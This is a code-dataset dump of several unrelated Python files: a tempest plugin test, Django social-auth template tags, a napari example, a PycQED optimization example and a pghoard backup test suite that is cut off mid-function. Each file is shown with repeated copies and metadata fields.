1次元配列を2次元配列に形状変換する # 時間軸合算 # 1日当たりの冷房全熱負荷の年間最大値(MJ/d)(20c)
2.227813
2
tempest/tests/test_tempest_plugin.py
mail2nsrajesh/tempest
1
6627906
# Copyright (c) 2015 Deutsche Telekom AG # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from tempest.lib.services import clients from tempest.test_discover import plugins from tempest.tests import base from tempest.tests import fake_tempest_plugin as fake_plugin class TestPluginDiscovery(base.TestCase): def test_load_tests_with_one_plugin(self): # we can't mock stevedore since it's a singleton and already executed # during test discovery. So basically this test covers the plugin loop # and the abstract plugin interface. manager = plugins.TempestTestPluginManager() fake_obj = fake_plugin.FakeStevedoreObj() manager.ext_plugins = [fake_obj] result = manager.get_plugin_load_tests_tuple() self.assertEqual(fake_plugin.FakePlugin.expected_load_test, result[fake_obj.name]) def test_load_tests_with_two_plugins(self): manager = plugins.TempestTestPluginManager() obj1 = fake_plugin.FakeStevedoreObj('fake01') obj2 = fake_plugin.FakeStevedoreObj('fake02') manager.ext_plugins = [obj1, obj2] result = manager.get_plugin_load_tests_tuple() self.assertEqual(fake_plugin.FakePlugin.expected_load_test, result['fake01']) self.assertEqual(fake_plugin.FakePlugin.expected_load_test, result['fake02']) def test__register_service_clients_with_one_plugin(self): registry = clients.ClientsRegistry() manager = plugins.TempestTestPluginManager() fake_obj = fake_plugin.FakeStevedoreObj() manager.ext_plugins = [fake_obj] manager._register_service_clients() expected_result = fake_plugin.FakePlugin.expected_service_clients registered_clients = registry.get_service_clients() self.assertIn(fake_obj.name, registered_clients) self.assertEqual(expected_result, registered_clients[fake_obj.name]) def test__get_service_clients_with_two_plugins(self): registry = clients.ClientsRegistry() manager = plugins.TempestTestPluginManager() obj1 = fake_plugin.FakeStevedoreObj('fake01') obj2 = fake_plugin.FakeStevedoreObj('fake02') manager.ext_plugins = [obj1, obj2] manager._register_service_clients() expected_result = fake_plugin.FakePlugin.expected_service_clients registered_clients = registry.get_service_clients() self.assertIn('fake01', registered_clients) self.assertIn('fake02', registered_clients) self.assertEqual(expected_result, registered_clients['fake01']) self.assertEqual(expected_result, registered_clients['fake02']) def test__register_service_clients_one_plugin_no_service_clients(self): registry = clients.ClientsRegistry() manager = plugins.TempestTestPluginManager() fake_obj = fake_plugin.FakeStevedoreObjNoServiceClients() manager.ext_plugins = [fake_obj] manager._register_service_clients() registered_clients = registry.get_service_clients() self.assertNotIn(fake_obj.name, registered_clients)
# Copyright (c) 2015 Deutsche Telekom AG # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from tempest.lib.services import clients from tempest.test_discover import plugins from tempest.tests import base from tempest.tests import fake_tempest_plugin as fake_plugin class TestPluginDiscovery(base.TestCase): def test_load_tests_with_one_plugin(self): # we can't mock stevedore since it's a singleton and already executed # during test discovery. So basically this test covers the plugin loop # and the abstract plugin interface. manager = plugins.TempestTestPluginManager() fake_obj = fake_plugin.FakeStevedoreObj() manager.ext_plugins = [fake_obj] result = manager.get_plugin_load_tests_tuple() self.assertEqual(fake_plugin.FakePlugin.expected_load_test, result[fake_obj.name]) def test_load_tests_with_two_plugins(self): manager = plugins.TempestTestPluginManager() obj1 = fake_plugin.FakeStevedoreObj('fake01') obj2 = fake_plugin.FakeStevedoreObj('fake02') manager.ext_plugins = [obj1, obj2] result = manager.get_plugin_load_tests_tuple() self.assertEqual(fake_plugin.FakePlugin.expected_load_test, result['fake01']) self.assertEqual(fake_plugin.FakePlugin.expected_load_test, result['fake02']) def test__register_service_clients_with_one_plugin(self): registry = clients.ClientsRegistry() manager = plugins.TempestTestPluginManager() fake_obj = fake_plugin.FakeStevedoreObj() manager.ext_plugins = [fake_obj] manager._register_service_clients() expected_result = fake_plugin.FakePlugin.expected_service_clients registered_clients = registry.get_service_clients() self.assertIn(fake_obj.name, registered_clients) self.assertEqual(expected_result, registered_clients[fake_obj.name]) def test__get_service_clients_with_two_plugins(self): registry = clients.ClientsRegistry() manager = plugins.TempestTestPluginManager() obj1 = fake_plugin.FakeStevedoreObj('fake01') obj2 = fake_plugin.FakeStevedoreObj('fake02') manager.ext_plugins = [obj1, obj2] manager._register_service_clients() expected_result = fake_plugin.FakePlugin.expected_service_clients registered_clients = registry.get_service_clients() self.assertIn('fake01', registered_clients) self.assertIn('fake02', registered_clients) self.assertEqual(expected_result, registered_clients['fake01']) self.assertEqual(expected_result, registered_clients['fake02']) def test__register_service_clients_one_plugin_no_service_clients(self): registry = clients.ClientsRegistry() manager = plugins.TempestTestPluginManager() fake_obj = fake_plugin.FakeStevedoreObjNoServiceClients() manager.ext_plugins = [fake_obj] manager._register_service_clients() registered_clients = registry.get_service_clients() self.assertNotIn(fake_obj.name, registered_clients)
en
0.890241
# Copyright (c) 2015 Deutsche Telekom AG # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # we can't mock stevedore since it's a singleton and already executed # during test discovery. So basically this test covers the plugin loop # and the abstract plugin interface.
1.990282
2
example-django/app/templatetags/backend_utils.py
noisy/python-social-auth-steemconnect-examples
6
6627907
<reponame>noisy/python-social-auth-steemconnect-examples import re from django import template from social_core.backends.oauth import OAuthAuth from social_django.utils import Storage register = template.Library() name_re = re.compile(r'([^O])Auth') @register.filter def backend_name(backend): name = backend.__class__.__name__ name = name.replace('OAuth', ' OAuth') name = name.replace('OpenId', ' OpenId') name = name.replace('Sandbox', '') name = name_re.sub(r'\1 Auth', name) return name @register.filter def backend_class(backend): return backend.name.replace('-', ' ') @register.filter def order_backends(backends): order = { 'steemconnect': 0, 'facebook': 1, 'github': 2, 'twitter': 3, 'google-oauth2': 4, } backends = list(backends) backends.sort(key=lambda backend: order[backend[0]]) return backends @register.filter def icon_name(name): return { 'steemconnect': 'steem', 'stackoverflow': 'stack-overflow', 'google-oauth': 'google', 'google-oauth2': 'google', 'google-openidconnect': 'google', 'yahoo-oauth': 'yahoo', 'facebook-app': 'facebook', 'email': 'envelope', 'vimeo': 'vimeo-square', 'linkedin-oauth2': 'linkedin', 'vk-oauth2': 'vk', 'live': 'windows', 'username': 'user', }.get(name, name) @register.filter def social_backends(backends): backends = [(name, backend) for name, backend in backends.items() if name not in ['username', 'email']] backends.sort(key=lambda b: b[0]) return [backends[n:n + 10] for n in range(0, len(backends), 10)] @register.filter def legacy_backends(backends): backends = [(name, backend) for name, backend in backends.items() if name in ['username', 'email']] backends.sort(key=lambda b: b[0]) return backends @register.filter def oauth_backends(backends): backends = [(name, backend) for name, backend in backends.items() if issubclass(backend, OAuthAuth)] backends.sort(key=lambda b: b[0]) return backends @register.simple_tag(takes_context=True) def associated(context, backend): user = context.get('user') context['association'] = None if user and user.is_authenticated(): context['association'] = Storage.user.get_social_auth_for_user( user, backend.name ).first() return ''
import re from django import template from social_core.backends.oauth import OAuthAuth from social_django.utils import Storage register = template.Library() name_re = re.compile(r'([^O])Auth') @register.filter def backend_name(backend): name = backend.__class__.__name__ name = name.replace('OAuth', ' OAuth') name = name.replace('OpenId', ' OpenId') name = name.replace('Sandbox', '') name = name_re.sub(r'\1 Auth', name) return name @register.filter def backend_class(backend): return backend.name.replace('-', ' ') @register.filter def order_backends(backends): order = { 'steemconnect': 0, 'facebook': 1, 'github': 2, 'twitter': 3, 'google-oauth2': 4, } backends = list(backends) backends.sort(key=lambda backend: order[backend[0]]) return backends @register.filter def icon_name(name): return { 'steemconnect': 'steem', 'stackoverflow': 'stack-overflow', 'google-oauth': 'google', 'google-oauth2': 'google', 'google-openidconnect': 'google', 'yahoo-oauth': 'yahoo', 'facebook-app': 'facebook', 'email': 'envelope', 'vimeo': 'vimeo-square', 'linkedin-oauth2': 'linkedin', 'vk-oauth2': 'vk', 'live': 'windows', 'username': 'user', }.get(name, name) @register.filter def social_backends(backends): backends = [(name, backend) for name, backend in backends.items() if name not in ['username', 'email']] backends.sort(key=lambda b: b[0]) return [backends[n:n + 10] for n in range(0, len(backends), 10)] @register.filter def legacy_backends(backends): backends = [(name, backend) for name, backend in backends.items() if name in ['username', 'email']] backends.sort(key=lambda b: b[0]) return backends @register.filter def oauth_backends(backends): backends = [(name, backend) for name, backend in backends.items() if issubclass(backend, OAuthAuth)] backends.sort(key=lambda b: b[0]) return backends @register.simple_tag(takes_context=True) def associated(context, backend): user = context.get('user') context['association'] = None if user and user.is_authenticated(): context['association'] = Storage.user.get_social_auth_for_user( user, backend.name ).first() return ''
none
1
2.175033
2
examples/interactive_scripting.py
mrocklin/napari
1
6627908
<reponame>mrocklin/napari<filename>examples/interactive_scripting.py import numpy as np import napari from napari.qt import thread_worker import time with napari.gui_qt(): # create the viewer with an image data = np.random.random((512, 512)) viewer = napari.Viewer() layer = viewer.add_image(data) @thread_worker(start_thread=True) def layer_update(*, update_period, num_updates): # number of times to update for k in range(num_updates): time.sleep(update_period) dat = np.random.random((512, 512)) layer.data = dat # check that data layer is properly assigned and not blocked? while layer.data.all() != dat.all(): layer.data = dat yield layer_update(update_period=0.05, num_updates=100)
import numpy as np import napari from napari.qt import thread_worker import time with napari.gui_qt(): # create the viewer with an image data = np.random.random((512, 512)) viewer = napari.Viewer() layer = viewer.add_image(data) @thread_worker(start_thread=True) def layer_update(*, update_period, num_updates): # number of times to update for k in range(num_updates): time.sleep(update_period) dat = np.random.random((512, 512)) layer.data = dat # check that data layer is properly assigned and not blocked? while layer.data.all() != dat.all(): layer.data = dat yield layer_update(update_period=0.05, num_updates=100)
en
0.875352
# create the viewer with an image # number of times to update # check that data layer is properly assigned and not blocked?
2.771127
3
examples/numerical_optimizations.py
sergimasot/PycQED_py3
1
6627909
# import numpy as np # import scipy # from pycqed.measurement import sweep_functions as swf # from sweep_functions import (Sweep_function, Soft_Sweep) # from pycqed.measurement import AWG_sweep_functions as awg_swf # from pycqed.measurement import detector_functions as det # import matplotlib.pyplot as plt # from pycqed.analysis import measurement_analysis as MA ''' Warning: This code will not run as it is written in python2 for qtlab. However it is here to serve as an example of using the different options in the numerical optimizations. ''' FakeSample = qt.instruments.create('FakeSample', 'Bart_parameter_holder', dummy_instrument=True) MC = qt.instruments['MC'] try: MC.remove() except: pass MC = qt.instruments.create('MC', 'MeasurementControl', dummy_instrument=True) ''' Plan for fixing issue 154 1. clean up passing of arguments V 2. Make MC work with arbitrary optimization functions V 3. set mode as argument to MC (no longer global setting) V 4. get rid of the "scaling" parameter use stepsize instead -V 5. add termination condition V ''' class sweep_function1(Soft_Sweep): def __init__(self, **kw): super(sweep_function1, self).__init__() # From Soft_Sweep the self.sweep_control = 'soft' self.name = 'Sweep_function1' self.parameter_name = 'x' self.unit = 'unit_x' self.FakeSample = qt.instruments['FakeSample'] def set_parameter(self, val): self.FakeSample.set_x(val) class sweep_function2(Soft_Sweep): def __init__(self, **kw): super(sweep_function2, self).__init__() self.name = 'Sweep_function2' self.parameter_name = 'y' self.unit = 'unit_y' self.FakeSample = qt.instruments['FakeSample'] def set_parameter(self, val): self.FakeSample.set_y(val) class test_detector(object): def __init__(self, **kw): self.FakeSample = qt.instruments['FakeSample'] self.detector_control = 'soft' def acquire_data_point(self, **kw): return self.FakeSample.measure_convexity() def prepare(self,**kw): pass def finish(self,**kw): pass class test_parabolic_detector(test_detector): def __init__(self, **kw): super(test_parabolic_detector, self).__init__() self.value_names = 'F' self.value_units = 'unit_F' def acquire_data_point(self, **kw): return self.FakeSample.measure_2D_sinc() #sweepfunctions and detector sweepfunctions = [sweep_function1(), sweep_function2()] detector = test_parabolic_detector() start_val = np.array([1, 1]) initial_stepsize = np.array([-.1, .2]) # Initial guess x0 = start_val/initial_stepsize # Scaling parameters x_scale = 1/initial_stepsize bounds0 = np.array([(-100, 100), (-100, 100)]).T/initial_stepsize # needs to be rearranged bounds = np.zeros((len(bounds0[0]),2)) # Bounds for parameters (unused in Powell) for i in range(len(bounds0[0])): bounds[i][0] = bounds0[0][i] bounds[i][1] = bounds0[1][i] ftol = 1e-3 xtol = 1e-4 maxiter = 500 # Maximum No. iterations maxfun = 500 # Maximum No. function evaluations factr = 1e7 #1e7 pgtol = 1e-1 #2e-2 epsilon = 1e-1 #1e-2 epsilon_COBYLA = 0.2 # Initial step length accuracy_COBYLA = 1e-2 # Convergence tolerance constraints = np.array([100, 100]) minimize = True noise = 0.01 # Maximum amplitude of the Zero-Mean White Noise FakeSample.set_noise(noise) # Example 1 find optimum using Powell method: name = 'Powell method' MC.set_sweep_functions(sweepfunctions) # sets swf1 and swf2 MC.set_detector_function(detector) # sets test_detector ad_func_pars = {'adaptive_function': 'Powell', 'x0': x0, 'x_scale': x_scale, 'ftol': ftol, 'xtol': xtol, 'maxiter': maxiter, 'maxfun': maxfun, 'minimize': minimize} MC.set_adaptive_function_parameters(ad_func_pars) MC.run(name=name, mode='adaptive') MA.OptimizationAnalysis(auto=True, label=name) # Example 2 find optimum by using a function that got passed by hand. name = 'Nelder method' ad_func_pars = {'adaptive_function': scipy.optimize.fmin, 'x0': x0, 'x_scale': x_scale, 'ftol': ftol, 'xtol': xtol, 'maxiter': maxiter, 'maxfun': maxfun, 'minimize': minimize} MC.set_adaptive_function_parameters(ad_func_pars) MC.run(name=name, mode='adaptive') MA.OptimizationAnalysis(auto=True, label=name) # Example 3 make use of termination condition name = 'Nelder_with_termination' ad_func_pars = {'adaptive_function': scipy.optimize.fmin, 'x0': x0, 'x_scale': x_scale, 'ftol': ftol, 'xtol': xtol, 'maxiter': maxiter, 'maxfun': maxfun, 'minimize': minimize, 'f_termination': -1.95} MC.set_adaptive_function_parameters(ad_func_pars) MC.run(name=name, mode='adaptive') MA.OptimizationAnalysis(auto=True, label=name) # Example 4 make use of termination condition with maximize name = 'Nelder_maximize' ad_func_pars = {'adaptive_function': scipy.optimize.fmin, 'x0': x0, 'x_scale': x_scale, 'ftol': ftol, 'xtol': xtol, 'maxiter': maxiter, 'maxfun': maxfun, 'minimize': False, 'f_termination': .4} MC.set_adaptive_function_parameters(ad_func_pars) MC.run(name=name, mode='adaptive') MA.OptimizationAnalysis(auto=True, label=name) # Example 5 testing direc argument of Powell. name = 'Powel_direction scale =1 no direc' ad_func_pars = {'adaptive_function': 'Powell', 'x0': [1, 1], 'x_scale': 1, 'ftol': ftol, 'xtol': xtol, 'maxiter': maxiter, 'maxfun': maxfun} MC.set_adaptive_function_parameters(ad_func_pars) MC.run(name=name, mode='adaptive') MA.OptimizationAnalysis(auto=True, label=name) name = 'Powel_direction scale = 1 direc' ad_func_pars = {'adaptive_function': 'Powell', 'x0': [1, 1], 'ftol': ftol, 'direc': ([.2, 0], [0, .1]), # direc is a tuple of vectors 'xtol': xtol, 'maxiter': maxiter, 'maxfun': maxfun} MC.set_adaptive_function_parameters(ad_func_pars) MC.run(name=name, mode='adaptive') MA.OptimizationAnalysis(auto=True, label=name)
# import numpy as np # import scipy # from pycqed.measurement import sweep_functions as swf # from sweep_functions import (Sweep_function, Soft_Sweep) # from pycqed.measurement import AWG_sweep_functions as awg_swf # from pycqed.measurement import detector_functions as det # import matplotlib.pyplot as plt # from pycqed.analysis import measurement_analysis as MA ''' Warning: This code will not run as it is written in python2 for qtlab. However it is here to serve as an example of using the different options in the numerical optimizations. ''' FakeSample = qt.instruments.create('FakeSample', 'Bart_parameter_holder', dummy_instrument=True) MC = qt.instruments['MC'] try: MC.remove() except: pass MC = qt.instruments.create('MC', 'MeasurementControl', dummy_instrument=True) ''' Plan for fixing issue 154 1. clean up passing of arguments V 2. Make MC work with arbitrary optimization functions V 3. set mode as argument to MC (no longer global setting) V 4. get rid of the "scaling" parameter use stepsize instead -V 5. add termination condition V ''' class sweep_function1(Soft_Sweep): def __init__(self, **kw): super(sweep_function1, self).__init__() # From Soft_Sweep the self.sweep_control = 'soft' self.name = 'Sweep_function1' self.parameter_name = 'x' self.unit = 'unit_x' self.FakeSample = qt.instruments['FakeSample'] def set_parameter(self, val): self.FakeSample.set_x(val) class sweep_function2(Soft_Sweep): def __init__(self, **kw): super(sweep_function2, self).__init__() self.name = 'Sweep_function2' self.parameter_name = 'y' self.unit = 'unit_y' self.FakeSample = qt.instruments['FakeSample'] def set_parameter(self, val): self.FakeSample.set_y(val) class test_detector(object): def __init__(self, **kw): self.FakeSample = qt.instruments['FakeSample'] self.detector_control = 'soft' def acquire_data_point(self, **kw): return self.FakeSample.measure_convexity() def prepare(self,**kw): pass def finish(self,**kw): pass class test_parabolic_detector(test_detector): def __init__(self, **kw): super(test_parabolic_detector, self).__init__() self.value_names = 'F' self.value_units = 'unit_F' def acquire_data_point(self, **kw): return self.FakeSample.measure_2D_sinc() #sweepfunctions and detector sweepfunctions = [sweep_function1(), sweep_function2()] detector = test_parabolic_detector() start_val = np.array([1, 1]) initial_stepsize = np.array([-.1, .2]) # Initial guess x0 = start_val/initial_stepsize # Scaling parameters x_scale = 1/initial_stepsize bounds0 = np.array([(-100, 100), (-100, 100)]).T/initial_stepsize # needs to be rearranged bounds = np.zeros((len(bounds0[0]),2)) # Bounds for parameters (unused in Powell) for i in range(len(bounds0[0])): bounds[i][0] = bounds0[0][i] bounds[i][1] = bounds0[1][i] ftol = 1e-3 xtol = 1e-4 maxiter = 500 # Maximum No. iterations maxfun = 500 # Maximum No. function evaluations factr = 1e7 #1e7 pgtol = 1e-1 #2e-2 epsilon = 1e-1 #1e-2 epsilon_COBYLA = 0.2 # Initial step length accuracy_COBYLA = 1e-2 # Convergence tolerance constraints = np.array([100, 100]) minimize = True noise = 0.01 # Maximum amplitude of the Zero-Mean White Noise FakeSample.set_noise(noise) # Example 1 find optimum using Powell method: name = 'Powell method' MC.set_sweep_functions(sweepfunctions) # sets swf1 and swf2 MC.set_detector_function(detector) # sets test_detector ad_func_pars = {'adaptive_function': 'Powell', 'x0': x0, 'x_scale': x_scale, 'ftol': ftol, 'xtol': xtol, 'maxiter': maxiter, 'maxfun': maxfun, 'minimize': minimize} MC.set_adaptive_function_parameters(ad_func_pars) MC.run(name=name, mode='adaptive') MA.OptimizationAnalysis(auto=True, label=name) # Example 2 find optimum by using a function that got passed by hand. name = 'Nelder method' ad_func_pars = {'adaptive_function': scipy.optimize.fmin, 'x0': x0, 'x_scale': x_scale, 'ftol': ftol, 'xtol': xtol, 'maxiter': maxiter, 'maxfun': maxfun, 'minimize': minimize} MC.set_adaptive_function_parameters(ad_func_pars) MC.run(name=name, mode='adaptive') MA.OptimizationAnalysis(auto=True, label=name) # Example 3 make use of termination condition name = 'Nelder_with_termination' ad_func_pars = {'adaptive_function': scipy.optimize.fmin, 'x0': x0, 'x_scale': x_scale, 'ftol': ftol, 'xtol': xtol, 'maxiter': maxiter, 'maxfun': maxfun, 'minimize': minimize, 'f_termination': -1.95} MC.set_adaptive_function_parameters(ad_func_pars) MC.run(name=name, mode='adaptive') MA.OptimizationAnalysis(auto=True, label=name) # Example 4 make use of termination condition with maximize name = 'Nelder_maximize' ad_func_pars = {'adaptive_function': scipy.optimize.fmin, 'x0': x0, 'x_scale': x_scale, 'ftol': ftol, 'xtol': xtol, 'maxiter': maxiter, 'maxfun': maxfun, 'minimize': False, 'f_termination': .4} MC.set_adaptive_function_parameters(ad_func_pars) MC.run(name=name, mode='adaptive') MA.OptimizationAnalysis(auto=True, label=name) # Example 5 testing direc argument of Powell. name = 'Powel_direction scale =1 no direc' ad_func_pars = {'adaptive_function': 'Powell', 'x0': [1, 1], 'x_scale': 1, 'ftol': ftol, 'xtol': xtol, 'maxiter': maxiter, 'maxfun': maxfun} MC.set_adaptive_function_parameters(ad_func_pars) MC.run(name=name, mode='adaptive') MA.OptimizationAnalysis(auto=True, label=name) name = 'Powel_direction scale = 1 direc' ad_func_pars = {'adaptive_function': 'Powell', 'x0': [1, 1], 'ftol': ftol, 'direc': ([.2, 0], [0, .1]), # direc is a tuple of vectors 'xtol': xtol, 'maxiter': maxiter, 'maxfun': maxfun} MC.set_adaptive_function_parameters(ad_func_pars) MC.run(name=name, mode='adaptive') MA.OptimizationAnalysis(auto=True, label=name)
en
0.748529
# import numpy as np # import scipy # from pycqed.measurement import sweep_functions as swf # from sweep_functions import (Sweep_function, Soft_Sweep) # from pycqed.measurement import AWG_sweep_functions as awg_swf # from pycqed.measurement import detector_functions as det # import matplotlib.pyplot as plt # from pycqed.analysis import measurement_analysis as MA Warning: This code will not run as it is written in python2 for qtlab. However it is here to serve as an example of using the different options in the numerical optimizations. Plan for fixing issue 154 1. clean up passing of arguments V 2. Make MC work with arbitrary optimization functions V 3. set mode as argument to MC (no longer global setting) V 4. get rid of the "scaling" parameter use stepsize instead -V 5. add termination condition V # From Soft_Sweep the self.sweep_control = 'soft' #sweepfunctions and detector # Initial guess # Scaling parameters # needs to be rearranged # Bounds for parameters (unused in Powell) # Maximum No. iterations # Maximum No. function evaluations #1e7 #2e-2 #1e-2 # Initial step length # Convergence tolerance # Maximum amplitude of the Zero-Mean White Noise # Example 1 find optimum using Powell method: # sets swf1 and swf2 # sets test_detector # Example 2 find optimum by using a function that got passed by hand. # Example 3 make use of termination condition # Example 4 make use of termination condition with maximize # Example 5 testing direc argument of Powell. # direc is a tuple of vectors
2.078907
2
test/test_pghoard.py
Adnuntius/pghoard
731
6627910
<filename>test/test_pghoard.py """ pghoard Copyright (c) 2015 Ohmu Ltd See LICENSE for details """ import datetime import io import json import os import tarfile import time from pathlib import Path from unittest.mock import Mock, patch from pghoard import common from pghoard.common import (BaseBackupFormat, create_alert_file, delete_alert_file, write_json_file) from pghoard.pghoard import PGHoard from pghoard.pgutil import create_connection_string # pylint: disable=attribute-defined-outside-init from pghoard.rohmu import rohmufile from .base import PGHoardTestCase from .util import switch_wal, wait_for_xlog class TestPGHoard(PGHoardTestCase): def setup_method(self, method): super().setup_method(method) self.config = self.config_template({ "backup_sites": { self.test_site: { "basebackup_count": 1, "basebackup_interval_hours": 1, "nodes": [ { "host": "127.0.0.4", }, ], }, }, }) config_path = os.path.join(self.temp_dir, "pghoard.json") write_json_file(config_path, self.config) self.pghoard = PGHoard(config_path) # This is the "final storage location" when using "local" storage type self.local_storage_dir = os.path.join( self.config["backup_sites"][self.test_site]["object_storage"]["directory"], self.test_site ) self.real_check_pg_server_version = self.pghoard.check_pg_server_version self.pghoard.check_pg_server_version = Mock(return_value=90404) self.real_check_pg_versions_ok = self.pghoard.check_pg_versions_ok self.pghoard.check_pg_versions_ok = Mock(return_value=True) def teardown_method(self, method): self.pghoard.quit() self.pghoard.check_pg_server_version = self.real_check_pg_server_version self.pghoard.check_pg_versions_ok = self.real_check_pg_versions_ok super().teardown_method(method) @patch("subprocess.check_output") def test_handle_site(self, subprocess_mock): subprocess_mock.return_value = b"""\ systemid|6222667313856416063 timeline|1 xlogpos|0/B003760 dbname|""" self.pghoard.handle_site(self.test_site, self.config["backup_sites"][self.test_site]) assert len(self.pghoard.receivexlogs) == 1 or len(self.pghoard.walreceivers) == 1 assert len(self.pghoard.time_of_last_backup_check) == 1 def test_get_local_basebackups_info(self): basebackup_storage_path = os.path.join(self.local_storage_dir, "basebackup") os.makedirs(basebackup_storage_path) assert self.pghoard.get_remote_basebackups_info(self.test_site) == [] bb_path = os.path.join(basebackup_storage_path, "2015-07-03_0") # Handle case where metadata file does not exist assert self.pghoard.get_remote_basebackups_info(self.test_site) == [] metadata_file_path = bb_path + ".metadata" with open(bb_path, "wb") as fp: fp.write(b"something") with open(metadata_file_path, "w") as fp: json.dump({"start-time": "2015-07-03 12:00:00+00:00"}, fp) available_backup = self.pghoard.get_remote_basebackups_info(self.test_site)[0] assert available_backup["name"] == "2015-07-03_0" start_time = datetime.datetime(2015, 7, 3, 12, tzinfo=datetime.timezone.utc) assert available_backup["metadata"]["start-time"] == start_time assert available_backup["metadata"]["backup-reason"] == "scheduled" assert available_backup["metadata"]["normalized-backup-time"] is None assert available_backup["metadata"]["backup-decision-time"] bb_path = os.path.join(basebackup_storage_path, "2015-07-02_9") metadata_file_path = bb_path + ".metadata" with open(bb_path, "wb") as fp: fp.write(b"something") with open(metadata_file_path, "w") as fp: json.dump({"start-time": "2015-07-02 12:00:00+00:00"}, fp) basebackups = self.pghoard.get_remote_basebackups_info(self.test_site) assert basebackups[0]["name"] == "2015-07-02_9" assert basebackups[1]["name"] == "2015-07-03_0" bb_path = os.path.join(basebackup_storage_path, "2015-07-02_10") metadata_file_path = bb_path + ".metadata" with open(bb_path, "wb") as fp: fp.write(b"something") with open(metadata_file_path, "w") as fp: json.dump({"start-time": "2015-07-02 22:00:00+00"}, fp) basebackups = self.pghoard.get_remote_basebackups_info(self.test_site) assert basebackups[0]["name"] == "2015-07-02_9" assert basebackups[1]["name"] == "2015-07-02_10" assert basebackups[2]["name"] == "2015-07-03_0" def test_determine_backups_to_delete(self): now = datetime.datetime.now(datetime.timezone.utc) bbs = [ { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=10, hours=4) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=9, hours=4) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=9, hours=1) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=8, hours=4) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=7, hours=4) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=6, hours=4) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=6, hours=20) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=5, hours=4) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=4, hours=4) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=3, hours=4) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=2, hours=4) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=1, hours=4) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(hours=4) } }, ] site_config = { "basebackup_count": 4, "basebackup_count_min": 2, "basebackup_interval_hours": 24, } bbs_copy = list(bbs) to_delete = self.pghoard.determine_backups_to_delete(basebackups=bbs_copy, site_config=site_config) assert len(bbs_copy) == 4 assert len(to_delete) == len(bbs) - len(bbs_copy) assert to_delete == bbs[:len(to_delete)] assert bbs_copy == bbs[len(to_delete):] site_config["basebackup_count"] = 16 site_config["basebackup_age_days_max"] = 8 bbs_copy = list(bbs) to_delete = self.pghoard.determine_backups_to_delete(basebackups=bbs_copy, site_config=site_config) # 3 of the backups are too old (start time + interval is over 8 days in the past) assert len(bbs_copy) == 10 assert len(to_delete) == len(bbs) - len(bbs_copy) assert to_delete == bbs[:len(to_delete)] assert bbs_copy == bbs[len(to_delete):] site_config["basebackup_count"] = 9 bbs_copy = list(bbs) to_delete = self.pghoard.determine_backups_to_delete(basebackups=bbs_copy, site_config=site_config) # basebackup_count trumps backup age and backups are removed even though they're not too old assert len(bbs_copy) == 9 assert len(to_delete) == len(bbs) - len(bbs_copy) assert to_delete == bbs[:len(to_delete)] assert bbs_copy == bbs[len(to_delete):] site_config["basebackup_count"] = 16 site_config["basebackup_age_days_max"] = 2 site_config["basebackup_count_min"] = 6 bbs_copy = list(bbs) to_delete = self.pghoard.determine_backups_to_delete(basebackups=bbs_copy, site_config=site_config) # basebackup_count_min ensures not that many backups are removed even though they're too old assert len(bbs_copy) == 6 assert len(to_delete) == len(bbs) - len(bbs_copy) assert to_delete == bbs[:len(to_delete)] assert bbs_copy == bbs[len(to_delete):] site_config["basebackup_count_min"] = 2 bbs_copy = list(bbs) to_delete = self.pghoard.determine_backups_to_delete(basebackups=bbs_copy, site_config=site_config) # 3 of the backups are new enough (start time less than 3 days in the past) assert len(bbs_copy) == 3 assert len(to_delete) == len(bbs) - len(bbs_copy) assert to_delete == bbs[:len(to_delete)] assert bbs_copy == bbs[len(to_delete):] # Basebackups are disabled for this site (basebackup_interval_hours=None) # verify that determine_backups_to_delete still executes correctly site_config = {"basebackup_count": 4, "basebackup_count_min": 2, "basebackup_interval_hours": None} bbs_copy = list(bbs) to_delete = self.pghoard.determine_backups_to_delete(basebackups=bbs_copy, site_config=site_config) assert len(bbs_copy) == 4 assert len(to_delete) == len(bbs) - len(bbs_copy) assert to_delete == bbs[:len(to_delete)] assert bbs_copy == bbs[len(to_delete):] def test_local_refresh_backup_list_and_delete_old(self): basebackup_storage_path = os.path.join(self.local_storage_dir, "basebackup") wal_storage_path = os.path.join(self.local_storage_dir, "xlog") os.makedirs(basebackup_storage_path) os.makedirs(wal_storage_path) self.pghoard.set_state_defaults(self.test_site) assert self.pghoard.get_remote_basebackups_info(self.test_site) == [] def write_backup_and_wal_files(what): for bb, wals in what.items(): if bb: bb_path = os.path.join(basebackup_storage_path, bb) date_parts = [int(part) for part in bb.replace("_", "-").split("-")] start_time = datetime.datetime(*date_parts, tzinfo=datetime.timezone.utc) with open(bb_path, "wb") as fp: fp.write(b"something") with open(bb_path + ".metadata", "w") as fp: 